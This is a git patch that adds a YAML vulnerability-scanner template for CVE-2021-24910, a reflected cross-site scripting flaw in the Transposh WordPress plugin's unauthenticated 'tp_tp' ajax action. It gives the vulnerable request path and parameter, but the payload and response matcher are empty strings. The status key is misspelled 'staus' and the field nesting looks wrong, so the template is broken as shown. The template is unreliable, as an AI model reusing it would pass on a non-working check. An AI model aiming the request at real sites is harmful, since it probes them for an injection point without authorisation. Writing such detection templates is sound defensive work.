From 77303434c0f8292510f1c891d9bc06565c2b1c41 Mon Sep 17 00:00:00 2001 From: ScreaM <70141504+ScreaMy7@users.noreply.github.com> Date: Sat, 6 Aug 2022 11:25:03 +0530 Subject: [PATCH] Added CVE-2021-24910.yaml --- cves/2021/CVE-2021-24910.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-24910.yaml diff --git a/cves/2021/CVE-2021-24910.yaml b/cves/2021/CVE-2021-24910.yaml new file mode 100644 index 0000000000..be7fa3322a --- /dev/null +++ b/cves/2021/CVE-2021-24910.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-24910 + +info: + name: Transposh WordPress < 1.0.7 - Reflected Cross-Site Scripting (XSS) + author: Screamy + severity: medium + description: The plugin's ajax action "tp_tp" is vulnerable to an unauthenticated reflected Cross-Site Scripting vulnerability when GET unsanitize "q" parameter is processed. + reference: + - https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/ + - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-24910.txt + - https://wpscan.com/vulnerability/b5cbebf4-5749-41a0-8be3-3333853fca17 + tags: wordpress,wp-plugin,xss,Transposh,unauthenticated + + requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: staus + staus: + - 200 + + + + +